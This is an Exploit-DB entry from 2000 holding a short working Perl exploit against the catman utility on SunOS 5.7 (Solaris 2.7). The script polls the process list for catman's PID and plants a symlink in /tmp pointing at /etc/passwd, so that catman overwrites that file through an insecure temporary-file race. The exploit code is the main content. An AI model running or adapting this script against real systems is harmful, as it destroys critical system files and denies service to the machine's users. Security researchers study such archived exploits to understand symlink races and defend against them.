SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber

EDB-ID:

235


Author:

lwc

Type:

dos


Platform:

Solaris

Date:

2000-12-20


#!/usr/local/bin/perl -w 
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that  are symlinked to that file.
# The idea of this  script  is  to  watch the
# process  list  for  the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered.  This exploit depends
# on  system  speed  and  process  load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/passwd";
while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  while(<ps>) {
    @args = split " ", $_;
    if (/catman/) { 
      print "Symlinking sman_$args[1] to  $clobber\n";
      symlink($clobber,"/tmp/sman_$args[1]");
      exit(1);
    }
  }
}


# milw0rm.com [2000-12-20]